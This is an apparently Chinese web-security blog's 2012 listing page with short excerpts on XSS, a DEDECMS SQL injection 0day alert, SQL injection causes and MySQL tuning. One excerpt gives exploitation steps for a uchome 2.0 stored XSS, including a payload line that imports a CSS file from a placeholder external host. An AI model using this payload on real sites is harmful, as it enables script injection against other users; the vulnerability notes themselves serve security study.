不灭的焱

革命尚未成功,同志仍须努力

作者:php-note.com  发布于:2012-05-30 17:59  分类:编程基础/Web安全 

CSV其实就是 COMMA SEPARATED VALUE 的缩写,出现在档案总管中的档案类型是「逗号分格」,依计算机原来的设定,如果直接点选该档案,计算机将以EXCEL的模式开启该档案。

作者:php-note.com  发布于:2012-05-30 10:16  分类:编程基础/Web安全 

新浪微博XSS攻击源代码下载(2012.06.28_sina_XSS.txt)

作者:php-note.com  发布于:2012-05-30 01:56  分类:编程基础/Web安全 

0x01. XSS获取明文密码的多种方式

我已经感受到Web潮流带来的巨大革新,尤其是最近HTML5越来越火。浏览器们在客户端瓜分着这个Web OS,只要是对用户体验好的功能,浏览器之间就会互相学习,然后去实现,但是实现总是存在一些差异,有些差异是用户体验上的,有些则可能带来安全问题。

作者:php-note.com  发布于:2012-05-29 23:04  分类:编程基础/Web安全 

发布时间2010-09-03

影响版本uchome 2.0

漏洞描述看源码分析的,出错位置较敏感,而且基本没有利用限制,个人主页自定义风格时,可@import外部css文件

测试方法

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

作者:php-note.com  发布于:2012-05-29 23:03  分类:编程基础/Web安全 

利用条件:开启注册&&开启投稿

方法 :注册会员 -> 发表文章:内容输入

<style>@import 'http://xxx.com/xss.css';</style>
作者:php-note.com  发布于:2012-05-27 23:19  分类:编程基础/Web安全 

作者:php-note.com  发布于:2012-05-27 09:46  分类:编程基础/Web安全 

1、选取最适用的字段属性

2、使用连接(JOIN)来代替子查询(Sub-Queries)

3、使用联合(UNION)来代替手动创建的临时表

4、事务

5、锁定表

6、使用外键

7、使用索引

8、优化的查询语句

作者:php-note.com  发布于:2012-05-26 18:42  分类:编程基础/Web安全 

在报纸上看到xx又爆出0day漏洞是什么意思?

day漏洞,是已经发现但是官方还没发布补丁的漏洞。

信息安全意义上的0Day是指在安全补丁发布前而被了解和掌握的漏洞信息。

作者:php-note.com  发布于:2012-05-26 18:05  分类:编程基础/Web安全 

4月29日消息:国内安全研究团队“知道创宇”称截获到最新DEDECMS SQL注入0day,DEDECMS官网目前提供下载的最新版5.7也受影响,截止本告警发出时官方尚未给出补丁或解决方案,此漏洞利用简单且dedecms安装之后默认即开启漏洞模块。

知道创宇给出三种临时解决方案:

作者:php-note.com  发布于:2012-05-18 23:03  分类:编程基础/Web安全 

最近在折腾 PHP + MYSQL 的编程。了解了一些 PHP SQL 注入攻击的知识,总结一下经验。在我看来,引发 SQL 注入攻击的主要原因,是因为以下两点原因:

1. php 配置文件 php.ini 中的 magic_quotes_gpc选项没有打开,被置为 off;

2. 开发者没有对数据类型进行检查和转义。